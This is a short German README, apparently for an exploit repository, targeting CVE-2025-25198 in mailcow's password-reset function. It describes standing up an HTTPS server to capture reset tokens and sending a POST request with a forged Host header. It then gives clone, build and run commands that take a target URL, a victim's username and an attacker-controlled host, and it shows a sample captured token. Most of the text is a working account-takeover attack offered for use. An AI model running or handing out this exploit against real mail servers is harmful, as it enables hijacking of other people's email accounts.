
Erfasst Passwort-Reset-Tokens aus Mailcow Host-Header-Injection-Angriffen.
mailcow: dockerized ist eine Open-Source-Groupware-/E-Mail-Suite, die auf Docker basiert. Vor Version 2025-01a ermöglicht eine Schwachstelle in der Passwort-Reset-Funktion von mailcow einem Angreifer, den Host HTTP-Header zu manipulieren, um einen Passwort-Reset-Link zu generieren, der auf eine vom Angreifer kontrollierte Domain verweist. Dies kann zur Übernahme des Kontos führen, wenn ein Benutzer auf den manipulierten Link klickt.
Es richtet einen HTTPS-Server ein, der alle Anfragen empfängt, und sendet eine POST-Anfrage an die Website mit dem Host-Header und Ihrer ausgewählten . Sie können auch Burpsuite verwenden, um die Anfrage zu senden und das Token auf dem Server zu erhalten.
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port> <--insecure | optional >
Nach kurzer Wartezeit gibt der Server das Token aus, das Sie verwenden können:
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245